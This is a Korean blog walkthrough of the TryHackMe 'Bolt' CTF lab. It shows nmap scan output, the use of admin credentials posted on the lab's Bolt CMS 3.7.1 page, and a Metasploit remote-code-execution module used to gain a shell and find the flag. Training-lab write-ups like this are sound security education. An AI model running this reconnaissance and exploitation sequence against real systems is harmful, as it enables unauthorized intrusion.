TASK 1 Deploy the machine
연결이 잘됬는지 ping 을 떄려보겟습니다
:)
TASK 2 Hack your way into the machine!
1. ANSWER : 현재 웹서버 포트에 CMS가 있나요?
nmap -Sv -sC -A [머신 IP]
nmap -sV -sC -A 10.10.210.212
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 16:57 KST
Nmap scan report for 10.10.210.212
Host is up (0.28s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
| 256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
|_ 256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open http (PHP 7.2.32-1)
8080
2. ANSWER : CMS 서버에 유저이름은 무엇인가요?
3. ANSWER : CMS 서버에 패스워드는 무엇인가요?
CMS 가 뭔지 알아보자
CMS 는 텍스트 이미지 비디오 등 쉽게 생성및 수정관리 할수있는 소프트웨어라 한다.
웹서버에 들어가보자
apache httpd 2.4.29 를 쓰고있다
8080 서버
Bolt 웹 페이지가 나온다
밑으로 내려가면
Jake 라는 Admin 이 자기 비밀번호가 boltadmin123 이라고 대놓고 말해주고 있다
ㅋㅋ?
또한 Jake 에 유저이름은 bolt 라고 한다
username : bolt
password : boltadmin123
4. ANSWER : CMS 서버에 버전은 무엇인가요?
현재 버전을 알아내기 위해
로그인 페이지를 찾아보자
[머신 IP]/bolt
성공적으로 로그인 페이지에 들어갔다
로그인후
bolt
boltadmin123
맨밑에 버전을 알아냈다
Bolt 3.7.1
5. ANSWER 현재 취약점에 Bolt 3.7.1 cms 이가 있습니다 RCE 취약점을 찾으세요 (Exploit-DB) 그다음 EDB-ID가 무엇인가요?
RCE 취약점 이므로 metasploit 으로 모의침투를 해보겠습니다.
6. ANSWER : 취약점에 이름은 무엇인가요 /exploit
search bolt cms
use 0
show options
LHOST 를 뺴먹었네요
침투성공 !
7. ANSWER : flag.txt 를 찾아보세요
find / -name flag.txt
난이도 1.1/10
한줄평 : 정말 쉬운 CTF 였다
또하고싶다 :<
'TryHackMe | CTF' 카테고리의 다른 글
TryHackMe | Year of the Rabbit - 모의해킹 CTF (1) | 2024.10.12 |
---|---|
[TryHackMe] | Overpass - OSCP 모의해킹 (5) | 2024.10.03 |
TryHackMe | Startup - 모의해킹 CTF (0) | 2024.09.22 |
TryHackMe | Anonymous - 모의해킹 CTF (0) | 2024.09.17 |
Tryhackme kenobi | OSCP [모의해킹 CTF] (1) | 2024.09.14 |